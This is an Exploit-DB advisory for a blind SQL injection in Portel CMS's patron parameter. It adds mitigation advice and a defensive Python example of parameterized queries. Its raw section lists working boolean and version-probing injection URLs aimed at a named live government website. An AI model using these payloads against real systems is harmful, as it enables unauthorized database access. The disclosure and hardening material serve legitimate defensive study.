Vendor: Portel
Author: Chip D3 Bi0s
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL injection
CWE: 89
Product Name: Portel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Portel (patron) Blind SQL-injection Vulnerability

Portel is a content management system (CMS) developed by a Colombian company. It is vulnerable to blind SQL injection through the patron parameter of libreria/php/decide.php, which allows an attacker to execute arbitrary SQL commands on the underlying database. The injection point has the form http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>, where n is a valid patron. The advisory demonstrates the flaw with two requests that differ only in an appended boolean condition: http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/* (true) and http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/* (false).

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
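
The mitigation above as an added example (not Portel's code and not part of the original advisory): a Python/sqlite3 stand-in for the PHP lookup, contrasting string concatenation with allowlist validation plus a bound parameter, and a regression check that the true/false response difference disappears. The table and column names, the function names and the patron format are assumptions; the sample row is constructed.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data; schema names are assumptions, not Portel's schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE patrones (patron TEXT PRIMARY KEY, plantilla TEXT)")
    db.execute("INSERT INTO patrones VALUES ('01.', 'home.tpl')")
    return db


def lookup_vulnerable(db, patron):
    """Builds the SQL text by concatenation, so input can change the query logic."""
    sql = "SELECT plantilla FROM patrones WHERE patron = '" + patron + "'"
    return db.execute(sql).fetchone() is not None


# Assumed format for a patron value, modelled on the "01." seen in the advisory.
PATRON_RE = re.compile(r"[0-9]{1,4}\.?")


def lookup_hardened(db, patron):
    """Allowlist validation first, then a bound parameter that is never parsed as SQL."""
    if not PATRON_RE.fullmatch(patron):
        return False
    sql = "SELECT plantilla FROM patrones WHERE patron = ?"
    return db.execute(sql, (patron,)).fetchone() is not None


def oracle_present(lookup, db):
    """Regression check: do inputs that differ only in an appended boolean
    condition (the two request values from the advisory) get different answers?"""
    true_form = "01.' and 1=1/*"
    false_form = "01.' and 1=2/*"
    return lookup(db, true_form) != lookup(db, false_form)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks a boolean:", oracle_present(lookup_vulnerable, db))
    print("hardened lookup leaks a boolean:  ", oracle_present(lookup_hardened, db))
    print("legitimate value still resolves:  ", lookup_hardened(db, "01."))
```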

Exploit-DB raw data:

------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 # [+] Group         :  LatinHackTeam                #
 #####################################################

**********************************************************************
 Info Cms:
 * Name      : Portel
 * Web       : http://www.porteleditor.com
 * download  : http://www.porteleditor.com/instalacion/portelv2008.zip
               http://rapidshare.com/files/263383411/portelv2008.zip.html
 * Country   : Colombia
               
**********************************************************************


Example:
http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>
n = valid patron


DEMO LIVE:

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true


etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-08-05]